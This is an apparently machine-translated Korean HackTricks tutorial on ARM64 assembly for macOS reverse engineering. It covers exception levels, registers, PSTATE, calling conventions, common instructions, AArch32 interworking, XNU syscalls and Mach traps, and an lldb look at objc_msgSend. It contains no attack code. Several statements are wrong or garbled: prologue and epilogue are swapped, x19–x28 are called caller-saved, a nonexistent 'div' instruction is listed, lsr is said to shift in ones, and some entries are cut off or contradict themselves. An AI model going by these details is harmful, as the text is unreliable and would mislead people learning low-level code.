hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
2024-04-06 18:36:54 +00:00

45 KiB

Introduction to ARM64v8

htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅이 되는 AWS 해킹 배우기 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

예외 수준 - EL (ARM64v8)

ARMv8 아키텍처에서 실행 수준인 예외 수준 (EL)은 실행 환경의 권한 수준과 기능을 정의합니다. EL0부터 EL3까지 네 가지 예외 수준이 있으며 각각 다른 목적을 제공합니다:

  1. EL0 - 사용자 모드:
  • 이는 가장 낮은 권한 수준으로 일반 응용 프로그램 코드를 실행하는 데 사용됩니다.
  • EL0에서 실행되는 응용 프로그램은 서로 및 시스템 소프트웨어로부터 격리되어 보안성과 안정성을 향상시킵니다.
  1. EL1 - 운영 체제 커널 모드:
  • 대부분의 운영 체제 커널이 이 수준에서 실행됩니다.
  • EL1은 EL0보다 더 많은 권한을 가지며 시스템 자원에 액세스할 수 있지만 시스템 무결성을 보장하기 위해 일부 제한이 있습니다.
  1. EL2 - 하이퍼바이저 모드:
  • 이 수준은 가상화에 사용됩니다. EL2에서 실행되는 하이퍼바이저는 동일한 물리 하드웨어에서 실행되는 여러 운영 체제 (각각이 고유한 EL1에서)를 관리할 수 있습니다.
  • EL2는 가상화 환경의 격리 및 제어 기능을 제공합니다.
  1. EL3 - 안전 모니터 모드:
  • 이는 가장 높은 권한 수준으로 안전 부팅 및 신뢰할 수 있는 실행 환경에 자주 사용됩니다.
  • EL3는 안전 및 비안전 상태 간의 액세스를 관리하고 제어할 수 있습니다 (안전 부팅, 신뢰할 수 있는 OS 등).

이러한 수준의 사용은 사용자 응용 프로그램부터 가장 높은 권한을 가진 시스템 소프트웨어까지 시스템의 다양한 측면을 구조화하고 안전하게 관리하는 방법을 제공합니다. ARMv8의 권한 수준 접근 방식은 다른 시스템 구성 요소를 효과적으로 격리함으로써 시스템의 보안성과 견고성을 향상시킵니다.

레지스터 (ARM64v8)

ARM64에는 x0부터 x30으로 레이블이 지정된 31개의 범용 레지스터가 있습니다. 각각은 64비트 (8바이트) 값을 저장할 수 있습니다. 32비트 값만 필요한 작업에 대해 동일한 레지스터는 w0부터 w30의 이름을 사용하여 32비트 모드에서 액세스할 수 있습니다.

  1. x0 ~ x7 - 이들은 일반적으로 스크래치 레지스터로 사용되며 서브루틴에 매개변수를 전달하는 데 사용됩니다.
  • **x0**은 또한 함수의 반환 데이터를 운반합니다.
  1. x8 - 리눅스 커널에서 x8svc 명령을 위한 시스템 호출 번호로 사용됩니다. macOS에서는 x16이 사용됩니다!
  2. x9 ~ x15 - 더 많은 임시 레지스터로서 종종 로컬 변수에 사용됩니다.
  3. x16x17 - 함수 내부 호출 레지스터. 즉시 값에 대한 임시 레지스터입니다. 간접 함수 호출 및 PLT (Procedure Linkage Table) 스텁에도 사용됩니다.
  • **x16**은 macOS에서 svc 명령을 위한 시스템 호출 번호로 사용됩니다.
  1. x18 - 플랫폼 레지스터. 일반적인 목적 레지스터로 사용될 수 있지만 일부 플랫폼에서는 이 레지스터가 플랫폼별 용도로 예약되어 있습니다: Windows의 현재 스레드 환경 블록을 가리키는 포인터 또는 리눅스 커널에서 현재 실행 중인 작업 구조체를 가리키는 포인터.
  2. x19 ~ x28 - 이들은 호출자 저장 레지스터입니다. 함수는 호출자를 위해 이러한 레지스터의 값을 보존해야 하므로 스택에 저장되고 호출자로 돌아가기 전에 복구되어야 합니다.
  3. x29 - 프레임 포인터로 스택 프레임을 추적하는 데 사용됩니다. 함수가 호출되어 새로운 스택 프레임이 생성될 때 x29 레지스터가 스택에 저장되고 새로운 프레임 포인터 주소 (sp 주소)가 이 레지스터에 저장됩니다.
  • 이 레지스터는 일반 목적 레지스터로 사용될 수도 있지만 일반적으로 로컬 변수에 대한 참조로 사용됩니다.
  1. x30 또는 lr- 링크 레지스터. BL (Branch with Link) 또는 BLR (Register로 링크된 Branch) 명령을 실행할 때 pc 값을 이 레지스터에 저장하여 반환 주소를 보유합니다.
  • 다른 레지스터와 마찬가지로 사용할 수 있습니다.
  • 현재 함수가 새 함수를 호출하고 따라서 lr을 덮어쓸 것이라면, 시작 시에 스택에 저장하고 이것을 복구할 것입니다. 이것이 에필로그입니다 (stp x29, x30 , [sp, #-48]; mov x29, sp -> fplr을 저장하고 공간을 생성하고 새 fp를 얻음) 그리고 끝에서 복구합니다. 이것이 프롤로그입니다 (ldp x29, x30, [sp], #48; ret -> fplr을 복구하고 반환).
  1. sp - 스택 포인터, 스택의 맨 위를 추적하는 데 사용됩니다.
  • sp 값은 항상 적어도 쿼드워드 정렬을 유지해야 하며 그렇지 않으면 정렬 예외가 발생할 수 있습니다.
  1. pc - 다음 명령을 가리키는 프로그램 카운터. 이 레지스터는 예외 생성, 예외 반환 및 분기를 통해서만 업데이트될 수 있습니다. 이 레지스터를 읽을 수 있는 일반 명령은 분기와 링크 명령 (BL, BLR)뿐이며 pc 주소를 lr (링크 레지스터)에 저장하기 위한 것입니다.
  2. xzr - 제로 레지스터. 32비트 레지스터 형태에서는 **wzr**로도 불립니다. 제로 값을 쉽게 얻거나 **subs**를 사용하여 **xzr**에 결과 데이터를 저장하지 않고 비교를 수행하는 데 사용할 수 있습니다.

시스템 레지스터

수백 개의 시스템 레지스터 또는 특수 목적 레지스터(SPR)는 프로세서 동작을 모니터링하고 제어하는 데 사용됩니다.
이러한 레지스터는 전용 특수 명령어 **mrs**와 **msr**을 사용하여만 읽거나 설정할 수 있습니다.

특수 레지스터 **TPIDR_EL0**와 **TPIDDR_EL0**는 역공학에서 자주 발견됩니다. EL0 접미사는 레지스터에 액세스할 수 있는 최소 예외를 나타냅니다(이 경우 EL0은 정규 프로그램이 실행되는 권한 수준의 정규 예외입니다).
이들은 주로 메모리의 스레드 로컬 스토리지 영역의 기본 주소를 저장하는 데 사용됩니다. 일반적으로 첫 번째 레지스터는 EL0에서 실행 중인 프로그램에 대해 읽기 및 쓰기 가능하지만, 두 번째 레지스터는 EL0에서 읽을 수 있고 EL1에서 쓰기 가능합니다(커널과 같이).

  • mrs x0, TPIDR_EL0 ; TPIDR_EL0을 x0로 읽기
  • msr TPIDR_EL0, X0 ; x0를 TPIDR_EL0에 쓰기

PSTATE

PSTATE에는 운영 체제에서 볼 수 있는 SPSR_ELx 특수 레지스터로 직렬화된 여러 프로세스 구성 요소가 포함되어 있습니다. 여기에는 트리거된 예외의 권한 수준인 X가 포함됩니다(이를 통해 예외가 종료될 때 프로세스 상태를 복구할 수 있습니다).
다음은 접근 가능한 필드입니다:

  • N, Z, C, V 조건 플래그:
  • **N**은 작업이 음수 결과를 생성했음을 의미합니다.
  • **Z**는 작업이 0을 생성했음을 의미합니다.
  • **C**는 작업이 캐리되었음을 의미합니다.
  • **V**는 작업이 부호 오버플로우를 생성했음을 의미합니다:
  • 두 양수의 합은 음수 결과를 생성합니다.
  • 두 음수의 합은 양수 결과를 생성합니다.
  • 뺄셈에서 큰 음수가 작은 양수에서 뺄셈되고 결과가 주어진 비트 크기의 범위 내에 표현할 수 없는 경우.
  • 당연히 프로세서는 작업이 부호 있는지 여부를 알 수 없으므로 작업에서 C와 V를 확인하고 부호 있는지 또는 부호 없는지에 따라 발생한 캐리를 표시합니다.

{% hint style="warning" %} 모든 명령이 이러한 플래그를 업데이트하지는 않습니다. CMP 또는 **TST**와 같은 일부 명령은 그렇지만, **ADDS**와 같이 s 접미사가 있는 다른 명령도 그렇습니다. {% endhint %}

  • 현재 레지스터 너비(nRW) 플래그: 플래그가 값 0을 보유하면 프로그램이 재개되면 AArch64 실행 상태에서 실행됩니다.
  • 현재 예외 수준(EL): EL0에서 실행 중인 일반 프로그램은 값 0을 갖습니다.
  • 단계별 실행 플래그(SS): 디버거가 단계별 실행하기 위해 SPSR_ELx 내의 SS 플래그를 1로 설정합니다. 프로그램은 한 단계를 실행하고 단계별 예외를 발생시킵니다.
  • 잘못된 예외 상태 플래그(IL): 특권 소프트웨어가 잘못된 예외 수준 전송을 수행할 때 사용되며, 이 플래그는 1로 설정되고 프로세서는 잘못된 상태 예외를 트리거합니다.
  • DAIF 플래그: 이러한 플래그를 사용하여 특권 프로그램이 특정 외부 예외를 선택적으로 마스킹할 수 있습니다.
  • **A**가 1이면 비동기 중단이 트리거됩니다. **I**는 외부 하드웨어 인터럽트 요청에 응답하도록 구성하고 F는 빠른 인터럽트 요청과 관련이 있습니다.
  • 스택 포인터 선택 플래그(SPS): EL1 및 이상에서 실행 중인 특권 프로그램은 자체 스택 포인터 레지스터와 사용자 모델 스택 포인터 사이를 전환할 수 있습니다(예: SP_EL1EL0 사이). 이 전환은 SPSel 특수 레지스터에 쓰기를 통해 수행됩니다. EL0에서는 이 작업을 수행할 수 없습니다.

호출 규약 (ARM64v8)

ARM64 호출 규약에 따르면 함수에 전달되는 첫 번째 여덟 개의 매개변수x0부터 x7 레지스터에 전달됩니다. 추가 매개변수는 스택에 전달됩니다. 반환 값은 레지스터 **x0**에 반환되거나 128비트인 경우 **x1**에도 반환됩니다. **x19**부터 x30sp 레지스터는 함수 호출 간에 보존되어야 합니다.

어셈블리에서 함수를 읽을 때 함수 프롤로그와 에필로그를 찾으세요. 프롤로그는 일반적으로 프레임 포인터(x29)를 저장, 새 프레임 포인터를 설정하고 스택 공간을 할당하는 것을 포함합니다. 에필로그는 일반적으로 저장된 프레임 포인터를 복원하고 함수에서 반환하는 것을 포함합니다.

Swift에서의 호출 규약

Swift에는 자체 호출 규약이 있으며 https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64에서 찾을 수 있습니다.

일반 명령어 (ARM64v8)

ARM64 명령어는 일반적으로 opcode dst, src1, src2 형식을 갖습니다. 여기서 **opcode**는 수행할 작업을 나타내며(add, sub, mov 등), **dst**는 결과가 저장될 대상 레지스터이고 src1 및 **src2**는 소스 레지스터입니다. 소스 레지스터 대신 즉시 값도 사용할 수 있습니다.

  • mov: 한 레지스터에서 다른 레지스터로 값 이동.
  • 예: mov x0, x1 — 이는 x1의 값을 x0로 이동합니다.
  • ldr: 메모리에서 값을 레지스터로드합니다.
  • 예: ldr x0, [x1] — 이는 x1이 가리키는 메모리 위치에서 값을 x0로 로드합니다.
  • 오프셋 모드: 원래 포인터에 영향을 주는 오프셋이 표시됩니다. 예를 들어:
  • ldr x2, [x1, #8], 이는 x1 + 8에서 x2에 값을 로드합니다.
  • ldr x2, [x0, x1, lsl #2], 이는 x0 배열에서 x1(인덱스) * 4 위치의 객체를 x2에 로드합니다.
  • 선행 인덱스 모드: 이는 원래에 계산을 적용하고 결과를 얻은 후 새 원본을 원래에 저장합니다.
  • ldr x2, [x1, #8]!, 이는 x1 + 8x2에 로드하고 x1 + 8의 결과를 x1에 저장합니다.
  • str lr, [sp, #-4]!, 링크 레지스터를 sp에 저장하고 레지스터 sp를 업데이트합니다.
  • 후행 인덱스 모드: 이는 이전 것과 유사하지만 메모리 주소에 액세스한 다음 오프셋을 계산하고 저장합니다.
  • ldr x0, [x1], #8, x1x0에 로드하고 x1x1 + 8로 업데이트합니다.
  • PC 상대 주소 지정: 이 경우 로드할 주소가 현재 PC 레지스터와 관련하여 계산됩니다.
  • ldr x1, =_start, 이는 _start 심볼이 시작하는 주소를 현재 PC와 관련하여 x1에 로드합니다.
  • str: 메모리에 있는 레지스터값을 저장합니다.
  • 예: str x0, [x1] — 이는 x0의 값을 x1이 가리키는 메모리 위치에 저장합니다.
  • ldp: 레지스터 쌍 로드. 이 명령은 연속하는 메모리 위치에서 두 레지스터를 로드합니다. 메모리 주소는 일반적으로 다른 레지스터의 값에 오프셋을 추가하여 형성됩니다.
  • 예: ldp x0, x1, [x2] — 이는 각각 x2x2 + 8 위치의 메모리에서 x0x1을 로드합니다.
  • stp: 레지스터 쌍 저장. 이 명령은 연속하는 메모리 위치로 두 레지스터를 저장합니다. 메모리 주소는 일반적으로 다른 레지스터의 값에 오프셋을 추가하여 형성됩니다.
  • 예: stp x0, x1, [sp] — 이는 각각 spsp + 8 위치의 메모리에 x0x1을 저장합니다.
  • stp x0, x1, [sp, #16]! — 이는 각각 sp+16sp + 24 위치의 메모리에 x0x1을 저장하고 spsp+16로 업데이트합니다.
  • add: 두 레지스터의 값을 더하고 결과를 레지스터에 저장합니다.
  • 구문: add(s) Xn1, Xn2, Xn3 | #imm, [shift #N | RRX]
  • Xn1 -> 대상
  • Xn2 -> 피연산자 1
  • Xn3 | #imm -> 피연산자 2 (레지스터 또는 즉시값)
  • [shift #N | RRX] -> 시프트 또는 RRX 호출 수행
  • 예: add x0, x1, x2 — 이 명령은 x1x2의 값을 더하고 결과를 x0에 저장합니다.
  • add x5, x5, #1, lsl #12 — 이는 4096에 해당합니다 (1을 12번 시프트하여) -> 1 0000 0000 0000 0000
  • adds 이 명령은 add를 수행하고 플래그를 업데이트합니다.
  • sub: 두 레지스터의 값을 빼고 결과를 레지스터에 저장합니다.
  • add 구문을 확인하세요.
  • 예: sub x0, x1, x2 — 이 명령은 x1에서 x2의 값을 빼고 결과를 x0에 저장합니다.
  • subs 이 명령은 sub와 유사하지만 플래그를 업데이트합니다.
  • mul: 두 레지스터의 값을 곱하고 결과를 레지스터에 저장합니다.
  • 예: mul x0, x1, x2 — 이 명령은 x1x2의 값을 곱하고 결과를 x0에 저장합니다.
  • div: 한 레지스터의 값을 다른 레지스터로 나누고 결과를 레지스터에 저장합니다.
  • 예: div x0, x1, x2 — 이 명령은 x1의 값을 x2로 나누고 결과를 x0에 저장합니다.
  • lsl, lsr, asr, ror, rrx:
  • 논리 왼쪽 시프트: 끝부분에 0을 추가하여 다른 비트를 앞쪽으로 이동 (n번 2를 곱함)
  • 논리 오른쪽 시프트: 1을 시작 부분에 추가하여 다른 비트를 뒤로 이동 (부호 없는 경우 n번 2로 나눔)
  • 산술 오른쪽 시프트: **lsr**와 유사하지만 최상위 비트가 1인 경우 1을 추가함 (부호 있는 경우 n번 2로 나눔)
  • 오른쪽으로 회전: **lsr**와 유사하지만 오른쪽에서 제거된 것은 왼쪽에 추가됨
  • 확장된 오른쪽 회전: **ror**와 유사하지만 캐리 플래그가 "가장 상위 비트"로 사용됨. 따라서 캐리 플래그가 31번째 비트로 이동하고 제거된 비트가 캐리 플래그로 이동함.
  • bfm: 비트 필드 이동, 이러한 작업은 값을 복사하고 해당 값을 다른 레지스터에 배치함. **#s**는 가장 왼쪽 비트 위치를 지정하고 **#r**은 오른쪽으로 회전하는 양을 지정함.
  • 비트 필드 이동: BFM Xd, Xn, #r
  • 부호 있는 비트 필드 이동: SBFM Xd, Xn, #r, #s
  • 부호 없는 비트 필드 이동: UBFM Xd, Xn, #r, #s
  • 비트 필드 추출 및 삽입: 레지스터에서 비트 필드를 복사하고 다른 레지스터로 복사함.
  • BFI X1, X2, #3, #4 X2에서 3번째 비트부터 4비트를 X1에 삽입함
  • BFXIL X1, X2, #3, #4 X2의 3번째 비트에서 4비트를 추출하여 X1에 복사함
  • SBFIZ X1, X2, #3, #4 X2에서 4비트를 부호 확장하여 3번째 비트 위치부터 X1에 삽입하고 오른쪽 비트를 0으로 설정함
  • SBFX X1, X2, #3, #4 X2에서 3번째 비트부터 4비트를 추출하여 부호 확장하고 결과를 X1에 배치함
  • UBFIZ X1, X2, #3, #4 X2에서 4비트를 0으로 확장하여 3번째 비트 위치부터 X1에 삽입함
  • UBFX X1, X2, #3, #4 X2에서 3번째 비트부터 4비트를 추출하여 0으로 확장된 결과를 X1에 배치함.
  • X로 확장된 부호: 값을 확장하여 해당 값과 작업을 수행할 수 있도록 부호를 확장함 (부호 없는 버전에서는 0만 추가함):
  • SXTB X1, W2 W2에서 X1로 바이트의 부호를 확장함 (W2X2의 절반)
  • SXTH X1, W2 W2에서 X1로 16비트 숫자의 부호를 확장함
  • SXTW X1, W2 W2에서 X1로 바이트의 부호를 확장함
  • UXTB X1, W2 W2에서 X1로 바이트에 0을 추가하여 확장함
  • extr: 연결된 특정 레지스터 쌍에서 비트를 추출함.
  • 예: EXTR W3, W2, W1, #3 이 명령은 W1+W2를 연결하고 W2의 3번째 비트부터 W1의 3번째 비트까지 가져와 W3에 저장함.
  • cmp: 두 레지스터를 비교하고 조건 플래그를 설정함. 목적 레지스터를 제로 레지스터로 설정하는 subs의 별칭임. m == n인지 확인하는 데 유용함.
  • subs와 동일한 구문을 지원함
  • 예: cmp x0, x1 — 이 명령은 x0x1의 값을 비교하고 조건 플래그를 설정함.
  • cmn: 음수 비교 피연산자. 이 경우 adds의 별칭이며 동일한 구문을 지원함. m == -n인지 확인하는 데 유용함.
  • ccmp: 조건부 비교, 이전 비교가 참인 경우에만 수행되는 비교로 특정하게 nzcv 비트를 설정함.
  • cmp x1, x2; ccmp x3, x4, 0, NE; blt _func -> x1 != x2이고 x3 < x4인 경우 _func으로 이동함
  • 이는 이전 cmpNE인 경우에만 ccmp가 실행되므로 비트 nzcv가 0으로 설정됨 (blt 비교를 충족하지 않음).
  • 이는 ccmn으로도 사용할 수 있음 (음수인 경우 cmpcmn과 유사함).
  • tst: 비교 값 중 어느 값이라도 1인지 확인함 (ANDS처럼 작동하지만 결과를 어디에도 저장하지 않음). 값으로 지정된 레지스터의 비트 중 어느 비트가 1인지 확인하는 데 유용함.
  • 예: tst X1, #7 X1의 마지막 3비트 중 어느 비트가 1인지 확인함
  • teq: 결과를 버리는 XOR 연산
  • b: 조건 없는 분기
  • 예: b myFunction
  • 이는 링크 레지스터를 반환 주소로 채우지 않음 (반환해야 하는 서브루틴 호출에 적합하지 않음)
  • bl: 링크가 포함된 분기, 서브루틴을 호출하는 데 사용됨. 반환 주소를 x30에 저장함.
  • 예: bl myFunction — 이 명령은 myFunction 함수를 호출하고 반환 주소를 x30에 저장함.
  • 이는 링크 레지스터를 반환 주소로 채우지 않음 (반환해야 하는 서브루틴 호출에 적합하지 않음)
  • blr: 레지스터에 지정된 대상을 호출하는 링크가 포함된 분기, 반환 주소를 x30에 저장함. (이는
  • 예: blr x1 — 이 명령은 x1에 포함된 주소의 함수를 호출하고 반환 주소를 x30에 저장함.
  • ret: 서브루틴에서 반환, 일반적으로 **x30**에 있는 주소를 사용함.
  • 예: ret — 이 명령은 현재 서브루틴에서 x30에 있는 반환 주소를 사용하여 반환함.
  • b.<cond>: 조건부 분기
  • b.eq: 동일한 경우 분기, 이전 cmp 명령을 기반으로 함.
  • 예: b.eq label — 이전 cmp 명령에서 두 값이 동일한 경우 label로 분기함.
  • b.ne: Equal이 아닌 경우 분기. 이 명령은 조건 플래그를 확인하고(이전 비교 명령에 의해 설정된), 비교된 값이 동일하지 않으면 레이블이나 주소로 분기합니다.
  • 예시: cmp x0, x1 명령 후, b.ne label — 만약 x0x1의 값이 동일하지 않다면, label로 이동합니다.
  • cbz: 0에 대한 비교 및 분기. 이 명령은 레지스터를 0과 비교하고, 동일하다면 레이블이나 주소로 분기합니다.
  • 예시: cbz x0, label — 만약 x0의 값이 0이라면, label로 이동합니다.
  • cbnz: 0이 아닌 값에 대한 비교 및 분기. 이 명령은 레지스터를 0과 비교하고, 동일하지 않다면 레이블이나 주소로 분기합니다.
  • 예시: cbnz x0, label — 만약 x0의 값이 0이 아니라면, label로 이동합니다.
  • tbnz: 비트 테스트 및 0이 아닌 경우 분기
  • 예시: tbnz x0, #8, label
  • tbz: 비트 테스트 및 0인 경우 분기
  • 예시: tbz x0, #8, label
  • 조건부 선택 연산: 조건 비트에 따라 동작이 달라지는 연산들.
  • csel Xd, Xn, Xm, cond -> csel X0, X1, X2, EQ -> 참인 경우, X0 = X1, 거짓인 경우, X0 = X2
  • csinc Xd, Xn, Xm, cond -> 참인 경우, Xd = Xn, 거짓인 경우, Xd = Xm + 1
  • cinc Xd, Xn, cond -> 참인 경우, Xd = Xn + 1, 거짓인 경우, Xd = Xn
  • csinv Xd, Xn, Xm, cond -> 참인 경우, Xd = Xn, 거짓인 경우, Xd = NOT(Xm)
  • cinv Xd, Xn, cond -> 참인 경우, Xd = NOT(Xn), 거짓인 경우, Xd = Xn
  • csneg Xd, Xn, Xm, cond -> 참인 경우, Xd = Xn, 거짓인 경우, Xd = - Xm
  • cneg Xd, Xn, cond -> 참인 경우, Xd = - Xn, 거짓인 경우, Xd = Xn
  • cset Xd, Xn, Xm, cond -> 참인 경우, Xd = 1, 거짓인 경우, Xd = 0
  • csetm Xd, Xn, Xm, cond -> 참인 경우, Xd = <all 1>, 거짓인 경우, Xd = 0
  • adrp: 심볼의 페이지 주소를 계산하고 레지스터에 저장합니다.
  • 예시: adrp x0, symbolsymbol의 페이지 주소를 계산하고 x0에 저장합니다.
  • ldrsw: 메모리에서 부호 있는 32비트 값을 로드하고 64비트로 부호 확장합니다.
  • 예시: ldrsw x0, [x1]x1이 가리키는 메모리 위치에서 부호 있는 32비트 값을 로드하고 64비트로 부호 확장하여 x0에 저장합니다.
  • stur: 레지스터 값을 메모리 위치에 저장, 다른 레지스터의 오프셋을 사용합니다.
  • 예시: stur x0, [x1, #4]x1에 현재 주소보다 4바이트 더 큰 메모리 주소에 있는 값을 x0에 저장합니다.
  • svc : 시스템 호출을 수행합니다. "Supervisor Call"의 약자입니다. 프로세서가 이 명령을 실행하면 사용자 모드에서 커널 모드로 전환하고, 커널의 시스템 호출 처리 코드가 있는 메모리의 특정 위치로 이동합니다.
  • 예시:
mov x8, 93  ; 레지스터 x8에 종료(93) 시스템 호출 번호를 로드합니다.
mov x0, 0   ; 종료 상태 코드(0)를 레지스터 x0에 로드합니다.
svc 0       ; 시스템 호출을 수행합니다.

함수 프롤로그

  1. 링크 레지스터와 프레임 포인터를 스택에 저장:

{% code overflow="wrap" %}

stp x29, x30, [sp, #-16]!  ; store pair x29 and x30 to the stack and decrement the stack pointer

{% endcode %}

  1. 새 프레임 포인터 설정: mov x29, sp (현재 함수에 대한 새 프레임 포인터 설정)
  2. 로컬 변수를 위한 스택에 공간 할당 (필요한 경우): sub sp, sp, <size> (는 필요한 바이트 수)

함수 에필로그

  1. 로컬 변수 해제 (할당된 경우): add sp, sp, <size>
  2. 링크 레지스터 및 프레임 포인터 복원:

{% code overflow="wrap" %}

ldp x29, x30, [sp], #16  ; load pair x29 and x30 from the stack and increment the stack pointer

{% endcode %}

  1. Return: ret (링크 레지스터의 주소를 사용하여 호출자에게 제어를 반환)

AARCH32 실행 상태

Armv8-A는 32비트 프로그램의 실행을 지원합니다. AArch32두 가지 명령어 세트 중 하나에서 실행될 수 있으며 **A32**와 **T32**로 구분되며 **interworking**을 통해 이들 간에 전환할 수 있습니다.
특권을 가진 64비트 프로그램은 32비트 프로그램의 실행을 스케줄링할 수 있으며 이는 낮은 특권을 가진 32비트로 예외 수준 전환을 실행함으로써 이루어집니다.
64비트에서 32비트로의 전환은 예외 수준의 낮아짐으로 발생합니다(예: EL1에서 EL0의 프로그램을 트리거하는 64비트 프로그램). 이는 AArch32 프로세스 스레드가 실행 준비가 되었을 때 SPSR_ELx 특수 레지스터의 비트 4를 1로 설정하여 수행되며, SPSR_ELx의 나머지 부분은 AArch32 프로그램의 CPSR을 저장합니다. 그런 다음 특권 있는 프로세스는 ERET 명령을 호출하여 프로세서가 **AArch32**로 전환되어 CPSR에 따라 A32 또는 T32로 진입합니다**.**

**interworking**은 CPSR의 J 및 T 비트를 사용하여 발생합니다. J=0T=0은 **A32**를 의미하며, J=0T=1T32를 의미합니다. 이는 기본적으로 명령어 세트가 T32임을 나타내기 위해 가장 낮은 비트를 1로 설정하는 것을 의미합니다.
이는 interworking 분기 명령어에서 설정되지만, PC가 대상 레지스터로 설정될 때 다른 명령어로 직접 설정할 수도 있습니다. 예시:

또 다른 예시:

_start:
.code 32                ; Begin using A32
add r4, pc, #1      ; Here PC is already pointing to "mov r0, #0"
bx r4               ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)

.code 16:
mov r0, #0
mov r0, #8

레지스터

32비트 레지스터가 16개 있습니다 (r0-r15). r0부터 r14까지어떤 작업에도 사용할 수 있지만, 일부는 일반적으로 예약되어 있습니다:

  • r15: 프로그램 카운터 (항상). 다음 명령의 주소를 포함합니다. A32에서는 현재 + 8, T32에서는 현재 + 4입니다.
  • r11: 프레임 포인터
  • r12: 프로시저 내부 호출 레지스터
  • r13: 스택 포인터
  • r14: 링크 레지스터

또한, 레지스터는 **은행 레지스트리**에 백업됩니다. 이는 레지스터 값을 저장하여 예외 처리 및 특권 작업에서 빠른 컨텍스트 전환을 수행할 수 있도록 하여 매번 레지스터를 수동으로 저장하고 복원할 필요가 없게 합니다.
이는 프로세서 상태를 CPSR에서 예외가 발생한 프로세서 모드의 SPSR로 저장함으로써 수행됩니다. 예외가 반환되면 **CPSR**가 **SPSR**에서 복원됩니다.

CPSR - 현재 프로그램 상태 레지스터

AArch32에서 CPSR은 AArch64의 **PSTATE**와 유사하게 작동하며, 예외가 발생하여 나중에 실행을 복원할 때 **SPSR_ELx**에도 저장됩니다:

필드는 몇 가지 그룹으로 나뉩니다:

  • 응용 프로그램 상태 레지스터 (APSR): 산술 플래그 및 EL0에서 접근 가능
  • 실행 상태 레지스터: 프로세스 동작 (운영 체제에 의해 관리됨).

응용 프로그램 상태 레지스터 (APSR)

  • N, Z, C, V 플래그 (AArch64와 동일)
  • Q 플래그: 전문화된 포화 산술 명령을 실행하는 동안 정수 포화가 발생할 때 1로 설정됩니다. 한 번 **1**로 설정되면 수동으로 0으로 설정될 때까지 유지됩니다. 또한, 그 값을 암시적으로 확인하는 명령이 없으므로 수동으로 읽어야 합니다.
  • GE (이상 또는 같음) 플래그: SIMD (단일 명령, 다중 데이터) 작업에서 사용됩니다. "병렬 덧셈" 및 "병렬 뺄셈"과 같은 이러한 작업은 단일 명령에서 여러 데이터 포인트를 처리할 수 있게 합니다.

예를 들어, UADD8 명령은 4쌍의 바이트를 (두 32비트 피연산자에서) 병렬로 더하고 결과를 32비트 레지스터에 저장합니다. 그런 다음 이러한 결과를 기반으로 **APSR**의 GE 플래그를 설정합니다. 각 GE 플래그는 해당 바이트 쌍에 대한 덧셈이 오버플로우되었는지를 나타냅니다.

SEL 명령은 이러한 GE 플래그를 사용하여 조건부 작업을 수행합니다.

실행 상태 레지스터

  • JT 비트: **J**는 0이어야 하며 **T**가 0이면 A32 명령 세트가 사용되고, 1이면 T32가 사용됩니다.
  • IT 블록 상태 레지스터 (ITSTATE): 이들은 10-15 및 25-26 비트입니다. IT 접두어 그룹 내의 명령에 대한 조건을 저장합니다.
  • E 비트: 엔디안을 나타냅니다.
  • 모드 및 예외 마스크 비트 (0-4): 현재 실행 상태를 결정합니다. 5번째 비트는 프로그램이 32비트 (1) 또는 64비트 (0)로 실행되는지를 나타냅니다. 다른 4개는 현재 사용 중인 예외 모드를 나타냅니다 (예외가 발생하고 처리 중일 때). 숫자 세트는 이 처리 중에 다른 예외가 트리거될 경우의 현재 우선 순위를 나타냅니다.
  • AIF: 특정 예외는 A, I, F 비트를 사용하여 비활성화할 수 있습니다. **A**가 1이면 비동기 중단이 트리거됩니다. **I**는 외부 하드웨어 인터럽트 요청 (IRQ)에 응답하도록 구성하고 F는 빠른 인터럽트 요청 (FIR)와 관련이 있습니다.

macOS

BSD 시스템 호출

syscalls.master를 확인하세요. BSD 시스템 호출은 x16 > 0일 것입니다.

Mach Traps

syscall_sw.c에서 mach_trap_table을 확인하고 mach_traps.h에서 프로토 타입을 확인하세요. Mach traps의 최대 수는 MACH_TRAP_TABLE_COUNT = 128입니다. Mach traps는 x16 < 0이므로 이전 목록의 숫자를 음수로 호출해야 합니다: **_kernelrpc_mach_vm_allocate_trap**은 **-10**입니다.

또한 이러한 (및 BSD) 시스템 호출을 어떻게 호출할지 알아보려면 **libsystem_kernel.dylib**를 디스어셈블러에서 확인할 수 있습니다:

{% code overflow="wrap" %}

# macOS
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e

# iOS
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64

{% endcode %}

{% hint style="success" %} 가끔은 **libsystem_kernel.dylib**에서 디컴파일된 코드를 확인하는 것이 소스 코드를 확인하는 것보다 쉽습니다. 왜냐하면 여러 시스템 호출 (BSD 및 Mach)의 코드는 스크립트를 통해 생성되기 때문에 (소스 코드의 주석을 확인하십시오) dylib에서 호출되는 내용을 찾을 수 있습니다. {% endhint %}

machdep calls

XNU는 또 다른 유형의 호출인 machine dependent를 지원합니다. 이러한 호출의 수는 아키텍처에 따라 다르며 호출 또는 번호가 일정하게 유지되는 것은 보장되지 않습니다.

comm page

이는 모든 사용자 프로세스의 주소 공간에 매핑된 커널 소유 메모리 페이지입니다. 사용자 모드에서 커널 공간으로의 전환을 시스템 호출을 사용하는 것보다 더 빠르게 만들기 위해 사용됩니다. 이러한 전환은 매우 비효율적일 수 있습니다.

예를 들어, gettimeofdate 호출은 timeval의 값을 comm 페이지에서 직접 읽습니다.

objc_msgSend

Objective-C 또는 Swift 프로그램에서이 함수를 자주 찾을 수 있습니다. 이 함수를 사용하면 Objective-C 객체의 메서드를 호출할 수 있습니다.

매개변수 (자세한 정보는 문서에서 확인):

  • x0: self -> 인스턴스에 대한 포인터
  • x1: op -> 메서드의 선택자
  • x2... -> 호출된 메서드의 나머지 인수

따라서이 함수로의 분기 전에 중단점을 설정하면 lldb에서 쉽게 호출된 내용을 찾을 수 있습니다 (이 예에서 객체가 NSConcreteTask의 객체를 호출하여 명령을 실행합니다).

(lldb) po $x0
<NSConcreteTask: 0x1052308e0>

(lldb) x/s $x1
0x1736d3a6e: "launch"

(lldb) po [$x0 launchPath]
/bin/sh

